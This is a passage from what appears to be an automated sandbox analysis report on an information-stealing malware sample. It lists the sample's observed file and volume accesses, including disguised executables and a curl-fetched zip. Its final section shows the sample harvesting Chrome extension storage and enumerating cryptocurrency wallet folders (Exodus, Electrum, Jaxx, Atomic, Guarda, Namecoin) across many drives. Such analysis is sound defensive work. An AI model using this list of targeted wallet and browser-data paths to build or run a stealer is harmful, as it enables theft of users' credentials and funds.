                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeQueries volume information: C:\Users\user\AppData\Local\asm\COMSurrogate.exe VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\smartscreen.exe VolumeInformation
                                  Source: C:\Windows\SysWOW64\curl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip VolumeInformation
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeQueries volume information: C:\Users\user\AppData\Local\asm\COMSurrogate.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeQueries volume information: C:\Users\user\AppData\Local\Temp\smartscreen.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeQueries volume information: C:\Users\user\AppData\Local\asm\COMSurrogate.exe VolumeInformation
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00670030 GetLocalTime,__swprintf,18_2_00670030
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_00670722 GetUserNameW,18_2_00670722
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_0066416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,18_2_0066416A
                                  Source: C:\Users\user\Desktop\DM6vAAgoCw.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Stealing of Sensitive Information

                                  barindex
                                  Tries to harvest and steal browser information (history, passwords, etc)
                                  Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT
                                  Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG
                                  Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK
                                  Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
                                  Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001
                                  Source: C:\Windows\SysWOW64\xcopy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                                  Tries to steal Crypto Currency Wallets
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: D:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: D:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: D:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: D:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: D:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: D:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: E:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: E:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: E:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: E:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: E:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: E:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: F:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: F:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: F:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: F:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: F:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: F:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: G:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: G:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: G:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: G:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: G:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: G:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: H:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: H:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: H:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: H:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: H:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: H:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Guarda\Local Storage\
